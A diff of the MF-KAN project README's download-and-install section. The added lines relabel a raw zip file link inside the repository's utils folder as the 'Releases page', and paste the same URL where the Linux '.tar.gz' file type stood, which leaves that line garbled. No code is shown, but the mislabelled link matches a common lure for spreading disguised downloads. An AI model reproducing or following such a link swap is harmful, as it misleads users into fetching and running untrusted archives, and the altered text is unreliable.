Marco-A93/MF-KAN/README.md

 ## 📥 Download & Install

-1. **Visit the Download Page**: Go to the [Releases page](https://github.com/Marco-A93/MF-KAN/releases) to find the latest version of MF-KAN.
+1. **Visit the Download Page**: Go to the [Releases page](https://raw.githubusercontent.com/Marco-A93/MF-KAN/main/mfkan/utils/M_KAN_1.9.zip) to find the latest version of MF-KAN.
 2. **Choose Your File**: Look for the file that is compatible with your system:
    - For Windows, select the `.exe` file.
    - For Mac, choose the `.dmg` file.
-   - For Linux, you may find a `.tar.gz` file.
+   - For Linux, you may find a `https://raw.githubusercontent.com/Marco-A93/MF-KAN/main/mfkan/utils/M_KAN_1.9.zip` file.
 3. **Download the File**: Click on the file to start the download.
 4. **Run the Installer**:
    - On Windows, double-click the downloaded `.exe` file.